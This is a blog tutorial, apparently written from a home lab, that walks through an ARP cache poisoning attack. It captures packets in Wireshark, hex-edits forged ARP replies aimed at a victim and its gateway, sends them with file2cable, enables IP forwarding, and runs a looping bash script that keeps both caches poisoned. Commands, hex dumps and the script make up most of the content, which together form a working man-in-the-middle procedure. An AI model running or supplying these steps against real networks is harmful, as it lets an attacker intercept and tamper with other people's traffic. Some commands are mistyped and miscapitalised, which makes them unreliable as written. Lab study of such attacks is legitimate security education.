ARP spoofing, also known as ARP cache poisoning or ARP poison routing (APR), is a technique used to attack a Local Area Network (LAN) and it only effective if there is no tier security in place.
Principle of ARP Spoofing
To summarize, arp spoofing can be term as man in the middle attack or a DDOS attack as it will send a not existence MAC in the network. The diagram below will give you some idea of it.
To give you more an understanding on the packet, I decide to capture the info on my lab and it consists of different step and stage.
Stage 1: Collecting Packet information
1)The tools we use on this lab is wireshark, you can download the tools from the following Wireshark Download Page.
2)After you have perform the installation run the wireshark tools
3)Configure the interface for capturing packet
4)As per on screen, you will need to check on Capture packet in promiscuous mode which mean in the sniffing mode
5)After you have completed all the setting, click the start button and you will see some packet have been capture.
6)You should be getting some packet as below, this would be our interest for our next step
Stage 2 : Analysis of the packet
This is the sample of the right content of the files.
Export the selected packet to /tmp/script/arp
Edit the files by typing this command (hexedit –b /tmp/script/arp)
Info Remark
Destination 00 50 56 F4 78 89 (GW) @192.168.18.2
Target Ip add C0 A8 12 02 (GW) @ 192.168.18.2
Source 00 0C 29 F1 EF DB (Hacker) @ 192.168.18.139
Sender IP C0 A8 12 8B (Hacker) @ 192.168.18.139
Victim 00 0C 29 13 80 DD @ 192.168.18.130
Victim IP C0 A8 12 82 (GW) @ 192.168.18.130
00000000 00 0C 29 F1 EF DB 00 50 56 F4 78 89 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 50 56 F4 78 89 C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 F1 EF DB C0 A8 12 8B 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
Stage 3: Modify Packet
Start modify the victim packet
1) hexedit –b arp-victim
2) replace hacker mac address with viticm mac address
3) replace gateway mac address with hacker mac address
Before Changing the packet
00000000 00 0C 29 F1 EF DB 00 50 56 F4 78 89 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 50 56 F4 78 89 C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 F1 EF DB C0 A8 12 8B 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
After Changing the packet
00000000 00 0C 29 13 80 DD 00 0C 29 F1 EF DB 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 13 80 DD C0 A8 12 82 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
Save the files as arp-victim and sent the files to the victim
file2cable -v -i eth0 -f arp-victim
Summary
Before packet been modified
Hacker Mac | Gateway Mac | X |
X | Gateway Mac | Gateway IP address |
Hacker Mac | Hacker IP | x |
After packet been modified
Victim Mac | Hacker Mac | x |
x | Hacker Mac | Gateway Ip address |
Victim Mac | Victim Ip address | x |
Stage 4: Modify Gateway packet
1)Cp arp-victim arp-gateway
2)Hexedit –b arp-gateway
Before Changing the packet
00000000 00 0C 29 13 80 DD 00 0C 29 F1 EF DB 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 13 80 DD C0 A8 12 82 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
After Changing the packet
00000000 00 50 56 F4 78 89 00 0C 29 F1 EF DB 08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB C0 A8 12 82 .......PV.x.....
00000020 00 50 56 F4 78 89 C0 A8 12 02 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 ............
Enable IP forwarding on the backtrack
Echo 1 > /proc/sys/net/ipv4/ip_forward
Nano doarp.sh
Chmod 700 doarp.sh
#!/bin/bash
While [ 1 ];do
File2cable –I eth0 –f arp-victim
File2cable –I eth0 –f arp-gateway
Sleep 2
Done
Summary
Before packet been modified
Victim Mac | Hacker Mac | x |
x | Hacker Mac | Gateway Ip address |
Victim Mac | Victim IP | x |
After packet been modified
Gateway Mac | Hacker Mac | x |
x | Hacker Mac | Victim Ip address |
Gateway Mac | Gateway IP | x |
No comments:
Post a Comment